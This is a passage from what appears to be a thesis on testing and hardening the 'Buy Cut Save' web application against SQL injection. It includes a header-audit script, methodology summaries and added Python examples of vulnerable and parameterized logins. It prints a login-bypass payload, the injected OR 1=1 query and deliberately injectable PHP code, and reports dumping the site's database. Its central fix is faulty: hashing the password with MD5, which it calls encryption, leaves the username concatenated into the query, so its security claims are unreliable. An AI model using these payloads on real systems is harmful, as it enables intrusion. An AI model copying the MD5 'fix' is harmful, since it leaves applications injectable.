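def csp_directives(value: str) -> dict:
    """Parse 'name src src; name src' into {name: [sources]}."""
    directives = {}
    for part in value.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = [t.lower() for t in tokens[1:]]
    return directives


def check_csp(headers: dict) -> list:
    """Whitelist of sources, no inline script, breach reporting (Section 5.3.1)."""
    value = headers.get("Content-Security-Policy")
    if value is None:
        return ["CSP: header missing"]
    findings = []
    directives = csp_directives(value)
    if "default-src" not in directives:
        findings.append("CSP: no default-src fallback")
    scripts = directives.get("script-src", directives.get("default-src", []))
    if "*" in scripts:
        findings.append("CSP: script-src allows any origin")
    if "'unsafe-inline'" in scripts:
        findings.append("CSP: inline scripts allowed")
    if "report-uri" not in directives and "report-to" not in directives:
        findings.append("CSP: no violation reporting configured")
    return findings


def check_hsts(headers: dict) -> list:
    """Browser must only use secure connections (Section 5.3.2)."""
    value = headers.get("Strict-Transport-Security")
    if value is None:
        return ["HSTS: header missing"]
    findings = []
    match = re.search(r"max-age=(\d+)", value)
    if not match or int(match.group(1)) < MIN_HSTS_AGE:
        findings.append("HSTS: max-age missing or shorter than threshold")
    if "includesubdomains" not in value.lower():
        findings.append("HSTS: includeSubDomains not set")
    return findings


def check_session_cookie(headers: dict) -> list:
    """Session ID must not be discoverable (Section 5.3.3): it should travel
    only over HTTPS and be unreadable by script."""
    value = headers.get("Set-Cookie")
    if value is None:
        return []
    attrs = {a.strip().lower() for a in value.split(";")[1:]}
    findings = []
    if "secure" not in attrs:
        findings.append("Cookie: Secure flag missing, session id may travel over HTTP")
    if "httponly" not in attrs:
        findings.append("Cookie: HttpOnly flag missing, session id readable by script")
    return findings


def audit_headers(headers: dict) -> list:
    """Run all three checks and return the combined list of weaknesses."""
    return check_csp(headers) + check_hsts(headers) + check_session_cookie(headers)


if __name__ == "__main__":
    for label, hdrs in (("weak", WEAK_HEADERS), ("hardened", HARDENED_HEADERS)):
        print(label, audit_headers(hdrs) or ["no findings"])
```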
5.3.4 Input validation requirements standards
I used the Australian standard for input validation requirements given below to check whether the
BCS web application matches that standard or not. We tested the BCS web application with SQLI
attacks and hacked the whole database of the web application. As we went through the whole attack
technique, we passed injectable scripts or queries to hack that database, and the web application
allowed those queries or scripts in the URL (dpc.sa.gov.au, 2015). Basically, the web application
is accepting every user input; that is the main reason why the BCS application was hacked through
SQL injection. So we used this standard to check whether BCS is filtering the user input or not and
whether it is sanitising the user input or not. We followed the user input requirements standard
below for securing the BCS web application from SQL injection.
Figure 26 Australian Standard Input Validation Requirements
Every country has its own standards for web security; in Figure 26 I have given the Australian
standards for input validation requirements, which I used to secure the BCS web application from
SQL injection attack.
5.4 Current situation for security testing of web application
With the continuous dynamic growth in web development and integrated applications, security
testing methodology also requires appropriate advancement to provide security for web
applications. At present security testing is done with many technologies and methodologies. The
methodologies apply the same concept but with each individual's own frame of mind. Some
terminology used in web application security testing needs to be made clear:
• Vulnerability: occurs in the layered architecture of a web application; it is an issue
regarding weak scripts or scripts with a bug.
• URL manipulation: the web application transfers information between the server and the client
in the URL. Sometimes changing the URL leads to unpremeditated responses by the server.
• SQL injection: the process of obtaining information from the server by inserting similar SQL
statements into the queries sent to the server.
• XSS (Cross Site Scripting): when a user introduces client-side script into the web
application's user interface and this insertion is visible to other users, it is called XSS.
• Spoofing: refers to creating replicas of the web pages of a web application and of the website's
services, such as email.
Security testing is at a primary stage, yet it is delivering the required results. In simple
terms, the potential threats can be found and resolved by the current techniques. The following
figure shows the processes applied in security testing.
Figure 27 Steps for Security Testing
The above figure explains the steps of security testing. In the last few years the fear of hacking
has increased because of vulnerabilities found in SSL. That vulnerability was found two years after
it had been implemented all over the world. The vulnerability is named 'Heartbleed', as it was
found in the heartbeat concept of the secure socket layer. This vulnerability raises the effort and
requirements of security testing. It adds security to the testing infrastructure of a web
application, whose purpose is to discover vulnerabilities and keep data safe from unauthorised
access. There are many approaches to security testing. Generally the testing activity is performed
at the last stage of the SDLC. During testing, three things are never modified:
• Server or application configuration
• Services running on the server
• End user data hosted by the web application
Figure 28 Top 10 Reported Vulnerabilities in Web Application
Figure 28 shows the websites that have been found to have the most vulnerabilities. These are the
leading websites of IT companies in the world. It shows data from when the Heartbleed vulnerability
occurred. After this severe issue in website security, security testing became a rage because
everyone wants to save their sensitive information from hackers (Erdogan, 2009).
5.4.1 Google introduced two-layer authentication:
Google steps up security of web applications
SAN FRANCISCO, Sept. 20 (Xinhua) -- Google on Monday introduced a two-step
verification process to boost the security of Google Apps, its web-based suite of email,
messaging and collaboration applications.
The two-layer authentication requires Google Apps users to sign in to their account with the
combination of a password and a verification code sent to their mobile phone.
The company believed that the new measure will give users stronger protection to help fend
off risks like phishing scams and password reuse.
"This makes it much more likely that you're the only one accessing your data. Even if
someone has stolen your password, they'll need more than that to access your account,"
Eran Feigenbaum, director of security for Google Apps, said in a blog post.
The enhanced protection is now available to businesses, government and education
institutions that have subscribed to Google Apps.
"In the coming months, we'll also be offering this same security to our hundreds of millions
of individual Google users," Feigenbaum said.
The bad guys have the luxury of picking their shots. They may attack a system whenever they
want to, or not (Ryan, 2012).
5.4.2 Introduce SSL (Secure Sockets Layer):
Use of an SSL signed certificate helps prevent the following attacks:
• Network sniffing. Without SSL, your data is sent across the network using an unencrypted
channel. This means that anyone along the path can potentially sniff the traffic off the wire in
clear text.
• Web site spoofing. Without a valid SSL site certificate, it is more difficult for attackers to
attempt to use phishing sites that mimic the legitimate site. The use of SSL does help mitigate
these two issues, but it has one glaring weakness. The use of SSL does absolutely nothing to
prevent a malicious user from directly attacking the web application itself. As a matter of
fact, many attackers prefer to target SSL-enabled web applications because using this
encrypted channel may hide their activities from other network-monitoring devices (Ryan,
2012).
VI. Methodologies for securing web applications
There are many methodologies for securing web applications. Amongst them here we discuss
three of them with working methodology:
1. Agile Security testing
2. Penetration testing
3. OWASP frameworks
6.1 Agile security testing
The idea of agile security testing is to adapt the same thinking that drives agile software
engineering methods, in which traditional practices are applied to mitigating security risks in
software. Basically, it is an iterative process to deliver the best solution in application
security (Bavani, 2012). It translates the security objectives and requirements into security
tests with automated test cases. It also endorses the idea of starting security test cases before
the system is fully developed.
The Agile Security Testing methodology, as shown in Figure 29, has the following three main steps
(Ghani, Azham & Jeong, 2014):
1. Modelling of security requirements
2. Employing a highly testable architecture
3. Automated security tests
The modelling of security requirements is implemented by generating abuser stories, in simple
words misuse cases. In this methodology, a user must be recognised and authenticated with a
genuine combination of username and password to get privileged access to the web application.
Encrypted communication is always required between a client and the web application. The web
application's network traffic shall be observed for possible denial of service (DoS) attacks.
Presently, web applications are built with a three-layered architecture: a presentation layer, a
business service layer and a data service layer. The business service layer can be divided into
two layers, a process layer and a business entity layer. A highly testable architecture is obtained
by inserting a test layer on top of each layer. The resulting structural design is suitable for
agile development methodologies because of the multiple test layers. It also helps in security
testing because the architecture allows many security testing techniques to be applied within any
of the test layers. In general, in this architecture, testing can be done at three main levels with
different testing strategies. Firstly, by producing simulated objects, it is easy to execute a
single test layer. Then, by targeting an upper layer together with the layer it depends on, an
integration test can be executed. After that, by using the security requirements as reference
points, a required security property of the system can be verified or falsified. In order to get
the full benefit from Agile Security Testing, the security tests must be automated as much as
possible; this is the third step of the agile methodology.
Figure 29 Agile Software Testing Process
6.2 Penetration testing
Generally it is the most applied security testing methodology, as given in Figure 30, but it is a
security testing methodology that can be misused (Antunes & Vieira, 2014). To prevent the misuse
of penetration testing, Thompson proposes a structured penetration testing methodology. This
methodology is stricter than Agile Security Testing. Preferably, it is applicable to web
application development projects and consists of the following five main steps (Antunes & Vieira,
2014):
1. Create a threat model
2. Build a test plan
3. Execute test cases
4. Create the problem report
5. Execute a post-mortem evaluation
• The first step in this penetration testing methodology is to create a threat model, a detailed
written description of the risks that can loom over the application. It is of the utmost
importance to moderate these. Threat modelling is quite similar to the misuse case approach; in
short, it means thinking like a hacker when constructing the model. The key thing in threat
modelling is the facility to get an impression of the various vulnerabilities that have to be
present in order to realise a given threat, for example for a web application that allows users to
manage their bank account online. A threat modelling process helps security testers break a
usable threat goal into testable sub-goals that they can assess more simply.
• The second step is to build a test plan. It is a road map for the test. It is made to get a
high-level overview of the security test cases, to give an overview of how investigative testing
(which simultaneously provides learning, test design and test execution) will proceed, and to get a
synopsis of which components will be tested. The test plan addresses the following key points:
1) Logistics: the security testing project needs to be scheduled, and resources, both human and
machine, must be addressed.
2) Deliverables and timeline: to support the development it is necessary to integrate the results
with the project timeline. A proper timetable of activities and a list of deliverables along with
their descriptions must be addressed.
3) Test cases and tools: an overview of the security test cases that will be designed and
executed, the tools that are needed to conduct the tests, and the opportunities for automated
testing along with their tools must be addressed.
• The third step is to execute the developed test cases. Security issues and insecure behaviour
of software are hard to understand, so it is challenging to make good security test cases.
Fortunately, there are extensive public vulnerability databases and mailing lists that cover most
software.
• The fourth step is to make a report on the outcome of the security testing process. This is
critical for proving that a given vulnerability exists in the web application (Owasp.org.au,
2015).
• The fifth step is to execute a post-mortem assessment. The post-investigation evaluation is done
in a meeting session of the security test team, who analyse the security bugs/flaws that were
detected during the testing process.
The main focus of this evaluation is why these vulnerabilities were not found during the
development process, and to give solutions to improve the process to prevent such vulnerabilities
and other security issues. Post-mortem evaluations also help a security testing team to improve
the testing process, and give ideas for more perfect techniques to find security vulnerabilities.
Figure 30 Penetration Testing
6.3 Open Web Application Security Project (OWASP)
The Open Web Application Security Project (OWASP) is an open, non-profit community dedicated to
supporting organisations in developing, buying and maintaining applications that can be trusted
from a security point of view, as shown in Figure 31 (Owasp.org.au, 2015). All OWASP tools are
free and available to anyone interested in helping to improve application security.
The OWASP Testing Framework consists of five main phases (Owasp.org.au, 2015):
Figure 31 OWASP Testing Work Flow (Owasp.org.au, 2015)
• Before development begins
(a) Review policies and standards: policies need to be reviewed to ensure that appropriate
standards and documentation are available and ready to use by the development teams. This also
gives development teams guidelines and a detailed idea that they can follow (Owasp.org.au, 2015).
(b) Develop measurement and metrics criteria: measurement and metrics criteria need to be defined;
they can be used throughout the project. They also shed light on defects in both the process and
the product development, and ensure the traceability of applications (Owasp.org.au, 2015).
• During definition and design
(a) Review security requirements: it is important to have definite and agreed requirements. This
activity involves reviewing, testing and making assumptions on the basis of the requirements. In
other words, the security requirements are reviewed to see whether some terms are missing from the
security requirements and definitions. To find such gaps, the following security properties should
be considered (Owasp.org.au, 2015):
I. User profile Management
II. Authentication process
III. Authorization
IV. Data Confidentiality
V. Session Management
VI. Transport layer Security
VII. Integrity
VIII. Accountability
IX. Privacy
X. Tiered System Segregation
(b) Review design and architecture: the design documents, which are models describing the
application architecture, and their corresponding documented descriptions require reviewing. This
will ensure that the architecture applies the appropriate level of security as defined in the
requirements. Security flaws are identified in the design phase, which is the most effective place
to make changes (Owasp.org.au, 2015).
(c) Create and review UML models: Unified Modelling Language (UML) models are used to describe how
the application works. They must be reviewed in order to discover security weaknesses; this also
helps in understanding how the application works (Owasp.org.au, 2015).
(d) Create and review threat models: once the design and architecture review of the application,
together with the UML models, explains exactly how the system will work, a security model must be
built to analyse realistic threat scenarios. This makes it possible to ensure that the threats have
been mitigated. The analysis also discovers potential threats for which no mitigation strategies
are defined. Such findings can be used as reference points to adjust the design for the potential
threat (Owasp.org.au, 2015).
• During development
(a) Code walkthroughs: in this step the security team should carry out a code walkthrough with the
system architects and developers to understand the flow, the layout and the structure of the code
that builds the application. The developers can explain the logic and flow of the code. This also
helps the code review team to learn about the code, and the developers can explain why things were
developed the way they were (Owasp.org.au, 2015).
(b) Code reviews: the code walkthrough gives the security team a better understanding of the code
structure. It is a good initial step before reviewing the code for possible security defects.
• During deployment
(a) Application penetration testing: in this step reviews are carried out against the security
requirements. This includes analysis of the design and architecture for security flaws and security
code reviews. A penetration test is carried out to ensure that nothing has been missed
(Owasp.org.au, 2015).
(b) Configuration management testing: the application penetration testing process includes
scrutiny of how the infrastructure was managed and secured. A configuration may include a default
install stage with issues found vulnerable to exploitation.
• Maintenance and operations
(a) Conduct operational reviews: a process needs to be described for the operational side of both
the application and the infrastructure.
(b) Conduct periodic checks: this step checks the security risks; health checks of the application
find out whether the level of security is still sound.
(c) Ensure change verification: it is vital to check that newly developed application changes have
not affected security negatively. This step verifies the change (Erdogan, 2009).
VII. Approach for preventing SQL injection attack
SQL injection is a web application security vulnerability in which an attacker or hacker is able
to insert a SQL query that the web application will execute against its database. It results in
exposure of the back-end database of the website. A hacker's SQL injection attack on a website
occurs when a web application uses user-supplied data within a command or query without proper
validation and encoding. SQL injection permits a hacker to insert, read, alter, delete or update
data saved in the database. It is one of the most dominant web application security
vulnerabilities.
Key Concepts of a SQL Injection Attack:
• When user credentials are passed to the SQL interpreter as part of a query, there is a
possibility of a SQL injection vulnerability or data theft.
• Hackers supply specific data to the SQL interpreter as input and confuse the interpreter into
executing unintended commands.
• In this vulnerability, the SQL interpreter is fooled by the hacker's fake replica query: the SQL
interpreter cannot distinguish between the original commands and the fake data.
• A SQL injection affects the database layer of the web application.
7.1 Preventing SQL Injection:
• A proper input validation technique will prevent SQL injection. In addition, authentication is
performed by setting protocols for users to create strong credentials.
• Users should have the least permissions needed to access the database. Stored procedures that are
not in use need to be deleted. As a website administrator, a person needs to create credentials
that are not easy to guess, i.e. not based on personal details.
• Stored procedures should be used more because they are safe from SQL injection; however, the
concatenated arguments of a stored procedure can be injectable, so one needs to be aware of it.
• Inserting and using a parameterized query API also helps; it is used with substitution markers
(DuPaul, 2015).
SQL injection can be one of the hardest attacks to thwart and one of the most powerful to exploit. However, defences are available to make it less damaging or less likely to occur. The most powerful defence mechanism is proper use of validation. For instance, if the web application expects an e-mail address, then the application should validate and filter the input based on the e-mail address format. Validation can be performed by implementing either whitelisting or blacklisting mechanisms, that is, by defining what can be accepted and what should be dropped.
Validation can be implemented either on the client side or on the server side, but it is preferable to use it in both environments, because client-side checks are easy for an attacker to bypass. Implementing the validation mechanism on the server side reduces the risk the most; it is not complete, however, without client-side validation as well, because the client environment is also valuable: it not only offloads some processing but can also prevent malicious results coming back from the server.
Figure 32 Prevention for SQL Injection (DuPaul, 2015)
Figure 32 above explains how the web application can be protected from SQL injection attacks.
Some common defences are as follows:
 Make no assumptions about the size, type, or content of the data that is received by the application.
 Test the size and data type of the input and enforce appropriate limits to prevent buffer overruns.
 Test the contents of string variables and accept only expected values.
 Reject entries that contain binary data, escape sequences and comment characters.
 Never build Transact-SQL statements directly from end-user input; use stored procedures to validate user input.
 Implement multiple layers of validation and never concatenate user input that is not validated.
7.2 Prevention of SQL injection attacks by using Filters and techniques
There are many techniques that help in SQL injection prevention. The techniques shown in Figure 33 are used to inhibit SQL injection attacks.
Defensive coding: There are many coding approaches that can be used to counter SQL injection, such as input filtering and type checking of input. Implementing parameterized queries and stored procedures manually can prevent SQL injection; these methods are introduced in OWASP's guidance. The SQL code structure needs to be well defined before parameters are inserted into the query, since the parameters are used to fill in that structure. Developers need to define all parameters by understanding all input sources. After parameterizing the query, the developer must still validate the input data type appropriately: the programmer defines the expected type of the input, whether numeric, string or another data type, and if the data entered by the user is not of that type it can simply be rejected. Whitelist filtering is also used in validation; developers need to block some special characters so that only whitelisted special characters are accepted. The filtering method is appropriate for well-structured data, i.e. e-mail addresses, birth dates, etc.
Figure 33 Defensive Coding
7.2.1 SQL DOM:
The SQL DOM technique provides a safe way to avoid the SQL injection problem. It encapsulates database queries and changes the query-building process: in this process a set of classes enables automated data validation. It encourages developers to provide their own database schema and to build SQL statements using the resulting API. Runtime prevention, randomization and learning-based prevention are other methods for SQL injection prevention (Kumar and Indu, 2015).
7.2.2 AMNESIA:
AMNESIA is an acronym for Analysis and Monitoring for NEutralizing SQL Injection Attacks. It is a static analysis technique that helps in detecting illegal queries before they are executed in the database. In this technique, the developer creates a model of the genuine queries that could be generated by the web application. It also has a dynamic part, in which queries are checked against that model at runtime (Kumar and Indu, 2015).
7.2.3 Input validation
User-supplied data needs to be validated before it is used by the web application. Usually, web developers apply validation routines that transform user data into trusted data by filtering characters. Developers can apply several types of rules for runtime interpretation. For example, a PHP file may comprise both static PHP statements and HTML tags, and an HTML page may embed JavaScript code to be executed. A distinct feature of web applications is that application data and code can be represented as an unstructured sequence of bytes. Developers therefore have to anticipate the contexts where and how user data is used, since different contexts pose different validation requirements (e.g., case-sensitive validation). For example, applying the default HTML escaping validation is recommended for values inside HTML tags (Li and Xue, 2015).
7.2.4 Session management:
Web applications use the concept of a web session to provide security. A session is used to recognize and relate a series of web requests from the same user during a certain period of time. Session variables (or session data) are associated with a web session and can be used by the web application to record information from earlier web requests that affects the future execution of the application (i.e., application session state).
Session variables are maintained on the client side by a cookie and on the server side by a database. On the server side, a distinct identifier called the session ID is defined to index the session variables saved there and to identify the client on later requests. To manage the web session, frameworks and web programming languages (e.g., PHP and JSP) provide developers with a collection of functions. For example, in PHP, session_start() can be used to set up a web session and the predefined global array $_SESSION can be used to store the session variables (Li and Xue, 2015).
7.3 Prevention of injection in MySQL by using URL method attack
In this type of attack, an attacker can log on to an application with administrative privileges without a valid username and password. Authentication bypass vulnerabilities have so many different causes that it is not possible to give a comprehensive list of prevention methods, but the steps you can take include:
 Use a penetration testing framework to check for known authentication vulnerabilities in the IT infrastructure.
 When developing authentication code, actively check it for SQL injection vulnerabilities and buffer overflow errors.
 Be aware of the sorts of vulnerabilities outlined in this article.
 As ever, ensure that your applications are patched and up to date, and that your network hardware is running the latest firmware.
7.4 Analysis of web application code
To assess code quality, most development and testing teams rely on static code analysis together with common software verification activities. Static code analysis uses formal approaches and methods such as abstract interpretation to verify code in various programming languages (Burnett & Books24x7, 2004). This approach allows development teams to:
 Analyse the degree of code complexity and verify compliance with coding standards.
 Certify that the software will not crash due to specified types of runtime errors.
 Perform impact analysis to determine how a code change may affect the functionality or reliability of the application or other pages.
Beyond that, the following methods can be used to assess the written code:
7.4.1 By Static code Analysis with Polyspace code verifiers
Static code analysis begins with review processes that are manual in nature and time-consuming. It is quite different from dynamic testing, which primarily requires the application to be executed (Burnett & Books24x7, 2004). Static code analysis is performed on the source code of a program. It brings quality checks in early, before the application code is integrated and ready for test. During analysis, tools are used to measure complexity metrics and compliance with development standards; the tools discussed here are the Polyspace tools.
Polyspace tools use general methods that analyse the code deeply. They assess whether code quality is poor, acceptable or good on the basis of their test results, and they also verify that the code is free from run-time errors. Results of static analysis are important for software that requires safety certification (Burnett & Books24x7, 2004).
Some less advanced tools perform only elementary tests and can generate wrong outcomes, as false positives or false negatives.
7.4.2 Measuring code complexity and checking with coding standards
Cyclomatic complexity metrics give an important perspective when assessing the quality of code, which matters for software that is developed to high integrity. The metric quantifies the number of linearly independent paths through the code and so helps in understanding its complexity (Burnett & Books24x7, 2004). The more complex the code, the lower its quality. By setting thresholds on code complexity, developer teams can track the difficulty of the code.
Coding standards address the problem of measuring code quality across the wide range of languages used for software development. Languages like C and C++ support complex coding for better performance, whereas languages like PHP and Perl support an easier approach to coding (Burnett & Books24x7, 2004).
Coding standards are established to improve software quality by eliminating poor-quality, overly complex code. Polyspace code tools and verifiers check compliance with coding standards to assess code quality, and the complexity and code quality reports they generate help in understanding the code.
7.4.3 Proving the presence of errors
Abstract interpretation is a method that uses mathematical proof to analyse source code for errors such as arithmetic overflow, out-of-bounds array access and division by zero. Abstract interpretation points out the classes of code that could be checked with other methods, which helps in reducing the amount of code to review as well as proving the presence of errors. Abstract interpretation colours each element it finds in one of four ways:
Grey: cannot be modified
Red: can be improved
Green: good code
Orange: shows a coding standard violation
This colour coding helps to find out the status of specific parts of the source code.
7.4.4 Performing impact analysis
This analysis deals with how the written code could be changed without affecting the functionality of code in another area. It is important to ensure that quality improvements to the code do not affect the functionality of the system.
For example, assume that a development team has identified the code elements that are optimized for a real-time embedded system and also those elements that could be optimized in terms of quality. The developers need to analyse the impact of the quality improvement and of any dead code (In.mathworks.com, 2015).
7.5 URL method for prevention of SQL injection
The URL method is a filter approach used to address the SQL injection problem. A filter is a program that runs on the server before the servlet or JSP page. A filter can be attached to one or more JSP pages or servlets, and it examines the request and the information accompanying these resources. Typical filter applications are:
 Authentication: the user's identity determines whether the request is blocked or allowed.
 Logging and auditing: tracking web application users.
 Image conversion: converting images and scaling maps.
 Data compression: making downloads faster.
 Localization: targeting the request and response to an individual.
 XSL/T transformations of XML content: targeting responses of the web application to more than one type of client system.
There are many other filter applications, such as encryption, triggering resource access events, tokenizing, MIME-type chaining, and caching. A single filter can be used for many web pages, which is the biggest advantage of using filters: it enhances scalability and reusability (Burnett & Books24x7, 2004).
Designing a filter provides security against SQL injection. An attacker attacks with the help of URL alteration. If the URL is not validated, the URL request goes straight to the database server, which acts on it, so a small change in the URL by an attacker can ruin the whole application. By placing a filter between the request and the database server the web application can be secured, and because of the reusability of servlet filters only a single filter needs to be designed for all pages.
Figure 34 Single Filter for Different Pages
Figure 34 shows that when a request arrives for any page in the web application server it is first redirected to the filter. The filter analyses the request: if it is a valid request, the filter forwards it to the desired page; otherwise it diverts the request to the error page. A modified URL is thus not treated as a genuine request and is met with the error page (Roy, Singh and Sairam, 2012).
Figure 35 Web Application Filter Architecture
Figure 35 above shows the situation after adding filters to user input and after adding the MD5 hashing algorithm to sanitise user input so that the form is secure from SQL injection attack. I tested the same BCS application and passed into the URL the same SQL queries which previously manipulated the whole database, after implementing these changes. I found the results below after passing each query.
7.6 SQL injection by using Bypass authentication method
I filled out the login form with the values Login: ' OR ''=' and Password: ' OR ''='. Before, when I clicked on the sign-in button, it allowed me to go directly into the web page because the query compared nothing and passed. But after adding the MD5 algorithm into the web code, it no longer allows the user to bypass with this query. As you can see in the snapshot below, I passed the same values that I passed when the web application was vulnerable to the SQL bypass authentication method.
Figure 36 Buy Cut Save Application Login Page
Figure 36 shows that, after clicking on the Sign in button, the web page now goes to the error page. It won't allow the user to bypass the login authentication by comparing values in the SQL query, because I implemented the MD5 message digest algorithm, which is a cryptographic hash function. How we used the MD5 algorithm in our tested web application code:
We used the following line of code in our application to implement the MD5 algorithm in the web application.
$password = md5($_POST["inputPassword"]);
When a user submits input from the login page, the query is passed to the back end to check whether that user's information is authenticated or not. So when we use the MD5 algorithm in the select query, it converts the value "123456" into "e10adc3949ba59abbe56e057f20f883e". So when attackers fire any SQL injection, the password value will be encrypted into an MD5 value. If attackers try to bypass with the null values in the login page, they are sent to the error page, as we found in Figure 37. Below are the changes I made in the code to use this MD5 algorithm to secure against the bypass authentication SQL attack.
 Before, without using the MD5 algorithm:
$password = $_POST["inputPassword"]; // raw submitted password, used directly in the query below
$info = mysql_query("select * from admin where admin_name ='$admin_name' and password='$password'");
With this we can perform SQL injection. The injected value turns the query into
SELECT * FROM admin WHERE admin_name = '$admin_name' AND password = '' OR 1=1
so it easily breaks the condition of the query using the OR operator.
 After using the MD5 algorithm:
$admin_name = $_POST["inputEmail"];
$password = md5($_POST["inputPassword"]); // hash the submitted password before it is used in the query
$info = mysql_query("select * from admin where admin_name ='$admin_name' and password='$password'");
if (mysql_num_rows($info) > 0)
{
    $a = mysql_fetch_array($info);
    $_SESSION["Admin"] = $a["admin_name"];
    $_SESSION["AdminId"] = $a["admin_id"];
    $_SESSION['start'] = time(); // record the logged-in time now
    $_SESSION['expire'] = $_SESSION['start'] + (480 * 60); // session valid for 480 minutes
    header("Location:orders.php");
    exit();
}
else
{
    // no matching row: the user is sent to the error page (the rest of this branch is not shown on the page)
}
Figure 37 Buy Cut Save Application Login Page
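As an added example that is not part of the thesis, the following Python script contrasts the concatenated login query shown above with a login that binds admin_name as a query parameter and keeps the password out of the SQL text entirely, using an in-memory SQLite table with constructed sample data in place of the BCS MySQL database; the function names (setup_db, login_concatenated, login_parameterized, hash_password) and the pw_salt/pw_hash columns are this example's own, and PBKDF2 from the standard library stands in for md5 as the password hash.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed sample account for this example (not the BCS application's real data).
ADMIN_NAME = "admin"
ADMIN_PASSWORD = "123456"   # the value the thesis hashes with md5 in its own test
BYPASS_INPUT = "' OR ''='"  # the login/password value used on the page

PBKDF2_ROUNDS = 100_000


def hash_password(password: str, salt: bytes) -> bytes:
    """Salted, slow password hash (PBKDF2-HMAC-SHA256) used by the hardened login."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)


def setup_db() -> sqlite3.Connection:
    """In-memory stand-in for the admin table, holding one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE admin ("
        " admin_id INTEGER PRIMARY KEY,"
        " admin_name TEXT NOT NULL,"
        " password TEXT NOT NULL,"   # plaintext column, kept only so the vulnerable query can run
        " pw_salt BLOB NOT NULL,"
        " pw_hash BLOB NOT NULL)"
    )
    salt = os.urandom(16)
    conn.execute(
        "INSERT INTO admin (admin_name, password, pw_salt, pw_hash) VALUES (?, ?, ?, ?)",
        (ADMIN_NAME, ADMIN_PASSWORD, salt, hash_password(ADMIN_PASSWORD, salt)),
    )
    conn.commit()
    return conn


def login_concatenated(conn, admin_name: str, password: str):
    """The 'before' pattern from the page: user input is spliced into the SQL string.

    Returns the matched admin_name, or None.  Deliberately vulnerable so the
    bypass can be observed; never use this form.
    """
    sql = (
        "SELECT admin_id, admin_name FROM admin "
        f"WHERE admin_name = '{admin_name}' AND password = '{password}'"
    )
    row = conn.execute(sql).fetchone()
    return row[1] if row else None


def login_parameterized(conn, admin_name: str, password: str):
    """Hardened login: a placeholder for the name, a hash comparison for the password.

    admin_name is bound as a parameter, so the bypass input is matched literally
    and finds no row; the password never enters the SQL text at all.
    """
    row = conn.execute(
        "SELECT admin_id, admin_name, pw_salt, pw_hash FROM admin WHERE admin_name = ?",
        (admin_name,),
    ).fetchone()
    if row is None:
        return None
    _, name, salt, stored = row
    candidate = hash_password(password, salt)
    # constant-time comparison so timing does not reveal how much of the hash matched
    return name if hmac.compare_digest(candidate, stored) else None


if __name__ == "__main__":
    db = setup_db()
    print("concatenated, bypass input: ", login_concatenated(db, BYPASS_INPUT, BYPASS_INPUT))
    print("parameterized, bypass input:", login_parameterized(db, BYPASS_INPUT, BYPASS_INPUT))
    print("parameterized, real creds:  ", login_parameterized(db, ADMIN_NAME, ADMIN_PASSWORD))
```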
Secure SQL injection by using URL method and Blind SQL Injection:
Below is the security matrix for the BCS web application, which represents the vulnerabilities in each particular web page.
[Security matrix: rows are the SQL attacks (Injection in MySQL using URL method; Blind SQL Injection; Error-based SQL Injection; Authentication bypass); columns are the Admin Portal pages (Login Page; Home Page; Order Management Page; Product Management Page; Category Management Page; Newsletter Management Page). Each cell holds PASS (the page is vulnerable) or FAIL (the page is not vulnerable); the individual cell values are not recoverable from this copy.]
After analysing the security matrix, I found that in the BCS web application the category_form, newsletter_form and product_form files are vulnerable to all SQL injection methods.
These are the web pages vulnerable to the SQL injection methods that we tested previously, when we dumped the whole database by passing strong SQL queries in the URL.
Solution for SQL injection attacks for BCS web application:
Before, this web application was not sanitising or validating any user input. When attackers passed any malicious code in the URL or in the input tags, the query accepted all those values and added them to the database.
The solution for this attack is that we have to sanitise the user input and make sure the database only accepts input values that are acceptable.
For securing these vulnerable pages I implemented the INTVAL function in the PHP code, which only accepts integer values from the URL. So if an attacker passes any malicious code or any character values in the query, the function converts all values to an integer and does not allow him to fetch any back-end information. Below are the web pages in which I implemented the INTVAL function.
The web pages I secured from SQL injection are given below.
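The PHP edits themselves are not reproduced on the page. As an added example that is not the thesis's code, the following Python shows the two behaviours this chapter relies on: an intval-style coercion of the id parameter (php_intval here mirrors PHP's intval() on strings, an assumption of this example) and a stricter request filter in the style of section 7.5 that checks every URL parameter against a per-page whitelist and diverts anything unexpected to an error page before it can reach the database. The page names, the error page name and the parameter table are constructed placeholders.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Hypothetical per-page whitelist of accepted query parameters and their types
# (constructed for this example; not the BCS application's real routing table).
PAGE_PARAMS = {
    "category_form.php": {"id": "int"},
    "product_form.php": {"id": "int"},
    "newsletter_form.php": {"id": "int"},
}
ERROR_PAGE = "error.php"  # placeholder name for the page the filter diverts to

_LEADING_INT = re.compile(r"^\s*([+-]?[0-9]+)")
_STRICT_INT = re.compile(r"^[0-9]{1,9}$")


def php_intval(value: str) -> int:
    """Approximation of PHP's intval() on a string: leading digits are kept,
    everything after them is ignored, and a non-numeric string becomes 0.

    This is why a coerced page 'loads normally' when a quote or a false
    condition is appended to the id: the trailing text never reaches the query.
    """
    m = _LEADING_INT.match(value)
    return int(m.group(1)) if m else 0


def filter_request(url: str):
    """Servlet-filter style gate that runs before any page handler.

    Returns ("ok", page, clean_params) when every parameter is expected and
    well-formed, else ("error", ERROR_PAGE, {}) so the request never reaches
    the database layer.
    """
    parts = urlsplit(url)
    page = parts.path.rsplit("/", 1)[-1]
    spec = PAGE_PARAMS.get(page)
    if spec is None:                                # unknown page: not served at all
        return ("error", ERROR_PAGE, {})
    # parse_qs percent-decodes, so %27 is seen here as a quote, exactly as PHP sees it
    params = parse_qs(parts.query, keep_blank_values=True)
    clean = {}
    for name, values in params.items():
        if name not in spec or len(values) != 1:   # unexpected or repeated parameter
            return ("error", ERROR_PAGE, {})
        raw = values[0]
        if spec[name] == "int":
            if not _STRICT_INT.fullmatch(raw):      # reject rather than coerce
                return ("error", ERROR_PAGE, {})
            clean[name] = int(raw)
        else:
            clean[name] = raw
    if set(clean) != set(spec):                     # every expected parameter must be present
        return ("error", ERROR_PAGE, {})
    return ("ok", page, clean)


if __name__ == "__main__":
    base = "http://bcs.example/category_form.php?id="   # constructed host name
    for tail in ("5", "5%27", "5%20AND%201%3D2", "%27%20OR%201%3D1"):
        raw = parse_qs(urlsplit(base + tail).query)["id"][0]
        print(f"{tail:18} intval -> {php_intval(raw):<3} filter -> {filter_request(base + tail)[0]}")
```

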